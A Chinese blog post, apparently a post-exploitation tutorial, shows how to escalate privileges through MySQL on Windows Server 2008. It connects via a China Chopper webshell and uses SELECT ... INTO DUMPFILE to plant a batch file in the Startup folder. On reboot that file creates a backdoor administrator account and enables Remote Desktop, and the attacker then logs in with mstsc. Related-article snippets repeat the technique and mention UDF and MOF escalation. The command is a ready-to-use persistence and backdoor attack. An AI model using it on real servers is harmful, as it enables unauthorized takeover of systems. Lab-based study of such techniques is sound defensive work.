Mysql数据库提权—开机启动项提权

最新推荐文章于 2024-04-10 08:12:39 发布
最新推荐文章于 2024-04-10 08:12:39 发布
阅读量465 收藏 1
点赞数 1
分类专栏: 后渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cxrpty/article/details/104803513
版权

实验环境:windows2008、物理机

实验原理:利用Mysql,将后门写入开机自启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用

实验步骤:

一、利用中国菜刀连接win2008,并连接数据库

二、在数据库命令行写入命令:

select "net user cxr 123.com /add & net localgroup administrators cxr /add & REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" " into dumpfile "C:\\Users\\Administrator\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.bat"

成功在开机启动目录写入以下文件,并开启远程连接端口,当被攻击者开机启动时,自动执行该文件中的命令 :

三、进行远程连接操作

在物理机输入mstsc进行远程连接

 

没有如果ru果
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
提权mysql提权--udf、mof、启动项
yang1234567898的博客
01-05 1170
1、udf提权 当获取到mysql的root权限,需要进行权限提升,可以尝试使用udf提权 首先需要查看mysql是否有导入导出功能,如果secure_file_priv为null,则无法使用udf提权,如果value值为空,则可以继续尝试 show variables like 'secure_file_priv'; secure_file_priv的value为null ,不允许导入导出 secure_file_priv的value为/dir/,只允许dir目录下导入导.
MAC系统中添加MYSQL开机启动的方法
09-10
在MAC操作系统中,设置MySQL数据库服务开机启动是一个方便的配置,确保系统启动时数据库自动运行,为应用程序提供无缝连接。以下是一种简洁且易懂的方法来实现这一目标: 首先,我们需要创建一个配置文件,该文件将...
MySQL启动项提权
weixin_30293135的博客
03-24 79
关于MySQL启动项提权,听其名知其意。就是将一段 VBS脚本导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 下,如果管理员重启了服务器,那么就会自动调用该脚本,并执行其中的用户添加及提权命令! 这里有两种思路: 1. 如果 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录存在...
Mysql 开机启动项提权
Fly_鹏程万里
06-07 503
提权原理 利用Mysql,将后门文件写入开机启动项,同时因为是开机自启动,再写入之后,需要重启目标服务器(这个要求mysql的权限就很高,至少是管理员权限,甚至是system),该实验只能在windows中使用。 提权方式 第一种:如果" C:\Documents and Settings\All Users\「开始」菜单\程序\启动 "目录存在可读写的权限,那么我们可以直接将VBS提权脚本上传到该目录下! ...
Day4——提权学习之MySQL数据库启动项提权
0nc3的博客
12-17 226
0x00 原理 重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及提权命令。 0x01 利用条件 两种情况下均可用启动项提权 1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写 直接将 VBS 提权脚本上传到该目录下 2、以...
Linux安装Mysql数据库以及设置开机自启、卸载
10-11
本文将详细介绍一个完整的MySQL安装过程,包括如何设置数据库开机自启和卸载MySQL。以下是具体的步骤: 1. 首先,你需要将MySQL的安装包(如`mysql-8.0.29-el7-x86_64.tar.gz`)上传到 `/usr/local` 目录下。这可以...
MySQL 数据库安装与配置教程.docx
最新发布
07-22
- 启动 MySQL 服务,并设置为开机启动: ```bash sudo systemctl start mysql sudo systemctl enable mysql ``` - **登录 MySQL** - 使用 root 用户登录 MySQL: ```bash sudo mysql -u root -p ``` #### ...
VMware中Linux共享mysql数据库的方法
09-11
为了实现Linux下的MySQL数据库共享,我们需要准备以下几项基础条件: - Windows主机操作系统:本示例中使用的是Win7。 - VMware虚拟机软件:本示例中使用的是VMware 7版本。 - Linux发行版:本示例选择的是openSUSE ...
linux系统下安装配置解压版的MySQL数据库图解
09-09
在Linux系统中安装和配置MySQL数据库是一项基础但重要的任务,对于那些需要在服务器环境中管理数据库的IT专业人员来说至关重要。本文将详细介绍如何在Linux环境下安装和配置解压版的MySQL数据库。 首先,你需要从...
DB_OWNER权限备份hta到启动项提权的小工具.
03-04
DB_OWNER权限备份hta到启动项提权的小工具
内网渗透之——mysql数据库提权之——开机启动项提权
wsnbbz的博客
03-11 807
前提:只能在windows使用 原理 利用mysql,将后门写入开机启动项,因为是开机自启动,在写入之后,需要重启目标服务器才能生效(要求mysql的权限要很高,至少是管理员权限甚至需要system权限) 开机启动程序上传路径 C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startu...
mysql启动项,mysql启动项写入提权 -电脑资料
weixin_31021619的博客
03-23 108
if (get_magic_quotes_gpc()){function stripslashes_deep($value){$value = is_array($value)?array_map('stripslashes_deep',$value):stripslashes($value);return $value;}$_POST = array_map('stripslashes_...
mysql数据库程序 启动项_Day4——提权学习之MySQL数据库启动项提权
weixin_39801356的博客
01-19 108
0x00 原理重启服务器会自动调用导入到 C:\Documents and Settings\All Users\「开始」菜单\程序\启动下的VBS脚本,并执行其中的用户添加及提权命令。0x01 利用条件两种情况下均可用启动项提权1、C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录可读写直接将 VBS 提权脚本上传到该目录下2、以root账号...
启动项提权
yumengzth的博客
07-23 1725
0x00开机启动项提权 windows开机时候都会有一些开机启动的程序,那时候启动的程序权限都是system,因为是system把他们启动的,利用这点,我们可以将自动化脚本写入启动项,达到提权的目的。 0x01 关于自动化脚本 自动化脚本可以是bat文件,vbs文件等。 我们在拿到一个网站的webshell的时候如果想进一步的获得网站的服务器权限,查看服务器上系统盘的可读可写目录,若是启动目录 “...
mysql数据库提权
m0_63197559的博客
04-10 1025
MySQL数据库提权学习总结
mysql 一键安装 bat_MySql数据库Root用户提权
weixin_39852688的博客
11-21 166
(也可适用于WEBSHELL提权,此方法已被改进,不会弹黑CMD窗口.过段时间放出!)1、连接到mysql 服务器mysql -u root -h 192.168.0.1mysql.exe 这个程序在你安装了mysql的的bin目录中   2、让我们来看看服务器中有些什么数据库mysql>show databases;mysql默认安装时会有mysql、test这两个数据库,如果你看到有其它...
后渗透—— 数据库开机启动项提权
爱国小白帽
03-12 755
开机启动项提权原理:利用mysql,将后门写入开机启动项。同时因为是开机自启动,再写入之后,需要重启目标服务器。(这个要求mysql的权限就很高,至少是管理员权限甚至是system) 实验环境 Windows Server 2008 R2 x64 wamp MySQL-5.5.15-(64-bit).msi xampp-win32-5.6.28-1-VC11-installer 菜刀 s...
提权-MySQL数据库提权
acepanhuan的博客
02-28 1858
提权-MySQL数据库提权
MySQL数据库操作指南:退出与自动运行
最后,通过`ntsysv`工具也可以直观地设置开机启动项MySQL数据库的核心概念包括数据库、数据类型、运算符、SQL语句和数据库管理。数据库是存储数据的集合,它可以是结构化的,如关系数据库,其中数据按表格形式...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值